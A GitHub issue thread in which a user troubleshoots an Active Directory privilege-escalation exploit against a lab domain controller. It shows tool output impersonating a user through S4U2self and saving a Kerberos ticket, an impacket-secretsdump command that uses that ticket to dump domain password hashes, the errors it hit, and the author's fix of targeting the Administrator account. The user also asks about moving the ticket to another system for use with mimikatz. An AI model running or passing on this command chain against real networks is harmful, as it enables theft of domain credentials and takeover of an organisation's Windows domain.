Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

exploitation #4

Closed
C47world opened this issue Jan 5, 2022 · 1 comment
Closed

exploitation #4

C47world opened this issue Jan 5, 2022 · 1 comment

Comments

@C47world
Copy link

C47world commented Jan 5, 2022

  1. when i get this message, what can i do with this ccache file ? can i transfer this ccache file to another system and use with mimikatz?
    [] Impersonating test.misah
    [
    ] Requesting S4U2self
    [*] Saving ticket in test.misah.ccache

  2. when i get this message from exploit
    [] You can deploy a shell when you want using the following command:
    [$] KRB5CCNAME='test.misah.ccache' /usr/bin/impacket-secretsdump -target-ip 192.168.10.11 -dc-ip 192.168.10.11 -k -no-pass @'labdc01.lab.local'
    and run this command, i get error
    2.1. first error [-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
    [
    ] Cleaning up...

2.2. after i add -just-dc-user, i have another error
[] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[
] Using the DRSUAPI method to get NTDS.DIT secrets
[-] Kerberos SessionError: KRB_AP_ERR_MODIFIED(Message stream modified)
[] Something wen't wrong with the DRSUAPI approach. Try again with -use-vss parameter
[
] Cleaning up...

2.3. after i add -use-vss i still get new error
[-] SMB SessionError: STATUS_MORE_PROCESSING_REQUIRED({Still Busy} The specified I/O request packet (IRP) cannot be disposed of because the I/O operation is not complete.)

HOWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW TO FIX
help me please, thank you!

@C47world
Copy link
Author

C47world commented Jan 9, 2022

[FIXED]
fixed by deleting atr
-just-dc-user domain.local/Administrator

@C47world C47world closed this as completed Jan 9, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant